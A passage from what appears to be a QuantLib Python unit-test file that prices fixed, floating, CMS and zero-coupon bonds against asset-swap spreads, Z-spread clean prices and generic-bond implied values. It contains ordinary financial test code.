+ "\n par ASW spread: " + str(floatingBondParAssetSwapSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(Thirty360.BondBasis),
Following, fixingDays,
[1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondMktPrice1 = 88.45 ## market price observed on 7th June 2007
cmsBondMktFullPrice1 = cmsBondMktPrice1+cmsBond1.accruedAmount()
cmsBondParAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap1.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread1 = cmsBondParAssetSwap1.fairSpread()
cmsBondMktAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap1.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread1 = cmsBondMktAssetSwap1.fairSpread()
error5 = abs(cmsBondMktAssetSwapSpread1-
100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
self.assertFalse(error5>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market ASW spread: " + str(cmsBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(cmsBondParAssetSwapSpread1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(Thirty360.BondBasis),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondMktPrice2 = 94.08 ## market price observed on 7th June 2007
cmsBondMktFullPrice2 = cmsBondMktPrice2+cmsBond2.accruedAmount()
cmsBondParAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap2.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread2 = cmsBondParAssetSwap2.fairSpread()
cmsBondMktAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap2.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread2 = cmsBondMktAssetSwap2.fairSpread()
error6 = abs(cmsBondMktAssetSwapSpread2-
100*cmsBondParAssetSwapSpread2/cmsBondMktFullPrice2)
self.assertFalse(error6>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market ASW spread: " + str(cmsBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(cmsBondParAssetSwapSpread2)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice1 = 70.436
zeroCpnBondMktFullPrice1 = zeroCpnBondMktPrice1+zeroCpnBond1.accruedAmount()
zeroCpnBondParAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread1 = zeroCpnBondParAssetSwap1.fairSpread()
zeroCpnBondMktAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread1 = zeroCpnBondMktAssetSwap1.fairSpread()
error7 = abs(zeroCpnBondMktAssetSwapSpread1-
100*zeroCpnBondParAssetSwapSpread1/zeroCpnBondMktFullPrice1)
self.assertFalse(error7>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market ASW spread: " + str(zeroCpnBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(zeroCpnBondParAssetSwapSpread1)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice2 = 35.160
zeroCpnBondMktFullPrice2 = zeroCpnBondMktPrice2+zeroCpnBond2.accruedAmount()
zeroCpnBondParAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread2 = zeroCpnBondParAssetSwap2.fairSpread()
zeroCpnBondMktAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread2 = zeroCpnBondMktAssetSwap2.fairSpread()
error8 = abs(zeroCpnBondMktAssetSwapSpread2-
100*zeroCpnBondParAssetSwapSpread2/zeroCpnBondMktFullPrice2)
self.assertFalse(error8>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market ASW spread: " + str(zeroCpnBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(zeroCpnBondParAssetSwapSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
def testZSpread(self):
"""Testing clean and dirty price with null Z-spread against theoretical prices..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
fixedBondImpliedValue1 = fixedBond1.cleanPrice()
fixedBondSettlementDate1 = fixedBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
fixedBondCleanPrice1 = cleanPriceFromZSpread(fixedBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
fixedBondSettlementDate1)
tolerance = 1.0e-13
error1 = abs(fixedBondImpliedValue1-fixedBondCleanPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue1)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule(Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondImpliedValue2 = fixedBond2.cleanPrice()
fixedBondSettlementDate2 = fixedBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
fixedBondCleanPrice2 = cleanPriceFromZSpread(
fixedBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
fixedBondSettlementDate2)
error3 = abs(fixedBondImpliedValue2-fixedBondCleanPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue2)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1], [0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondImpliedValue1 = floatingBond1.cleanPrice()
floatingBondSettlementDate1 = floatingBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
floatingBondCleanPrice1 = cleanPriceFromZSpread(
floatingBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Semiannual,
floatingBondSettlementDate1)
error5 = abs(floatingBondImpliedValue1-floatingBondCleanPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue1)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## FRN bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule(Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondImpliedValue2 = floatingBond2.cleanPrice()
floatingBondSettlementDate2 = floatingBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
floatingBondCleanPrice2 = cleanPriceFromZSpread(
floatingBond2, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual,
floatingBondSettlementDate2)
error7 = abs(floatingBondImpliedValue2-floatingBondCleanPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue2)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## CMS bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondImpliedValue1 = cmsBond1.cleanPrice()
cmsBondSettlementDate1 = cmsBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
cmsBondCleanPrice1 = cleanPriceFromZSpread(
cmsBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
cmsBondSettlementDate1)
error9 = abs(cmsBondImpliedValue1-cmsBondCleanPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue1)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
## CMS bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondImpliedValue2 = cmsBond2.cleanPrice()
cmsBondSettlementDate2 = cmsBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
cmsBondCleanPrice2 = cleanPriceFromZSpread(
cmsBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
cmsBondSettlementDate2)
error11 = abs(cmsBondImpliedValue2-cmsBondCleanPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue2)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
## Zero-Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue1 = zeroCpnBond1.cleanPrice()
zeroCpnBondSettlementDate1 = zeroCpnBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
zeroCpnBondCleanPrice1 = cleanPriceFromZSpread(zeroCpnBond1,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate1)
error13 = abs(zeroCpnBondImpliedValue1-zeroCpnBondCleanPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue1)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue2 = zeroCpnBond2.cleanPrice()
zeroCpnBondSettlementDate2 = zeroCpnBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the yield curve
zeroCpnBondCleanPrice2 = cleanPriceFromZSpread(zeroCpnBond2,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate2)
error15 = abs(zeroCpnBondImpliedValue2-zeroCpnBondCleanPrice2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue2)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
def testGenericBondImplied(self):
"""Testing implied generic-bond value against asset-swap fair price with null spread..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1,
ActualActual(ActualActual.ISDA),
[self.faceAmount],
[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1,
Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
tuple(fixedBondLeg1))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure,True)
fixedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedBondPrice1)
self.assertFalse(error1>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice1)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2,Thirty360(Thirty360.BondBasis),
[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2,Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, tuple(fixedBondLeg2))
fixedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
error2 = abs(fixedBondAssetSwapPrice2-fixedBondPrice2)
self.assertFalse(error2>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice2)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),ModifiedFollowing, [fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
tuple(floatingBondLeg1))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
error3 = abs(floatingBondAssetSwapPrice1-floatingBondPrice1)
self.assertFalse(error3>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice1)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays],[],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
tuple(floatingBondLeg2))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
currentCoupon = 0.04013+0.0025
floatingCurrentCoupon = floatingBond2.nextCouponRate()
error4 = abs(floatingCurrentCoupon-currentCoupon)
self.assertFalse(error4>tolerance,
"wrong current coupon is returned for floater bond:"
+ "\n bond's calculated current coupon: " + str(currentCoupon)
+ "\n current coupon asked to the bond: " + str(floatingCurrentCoupon)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice2-floatingBondPrice2)
self.assertFalse(error5>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice2)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice2)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
## caps/floors belong in the 4th/5th list slots (gearings, spreads, caps, floors),
## matching the equivalent CmsRateBond and the CmsLeg in testMASWWithGenericBond
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, tuple(cmsBondLeg1))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
error6 = abs(cmsBondAssetSwapPrice1-cmsBondPrice1)
self.assertFalse(error6>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice1)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, tuple(cmsBondLeg2))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
error7 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error7>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice2)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnAssetSwap1 = AssetSwap(payFixedRate,
zeroCpnBond1, zeroCpnBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnAssetSwap1.fairCleanPrice()
error8 = abs(zeroCpnBondAssetSwapPrice1-zeroCpnBondPrice1)
self.assertFalse(error8>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice1)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
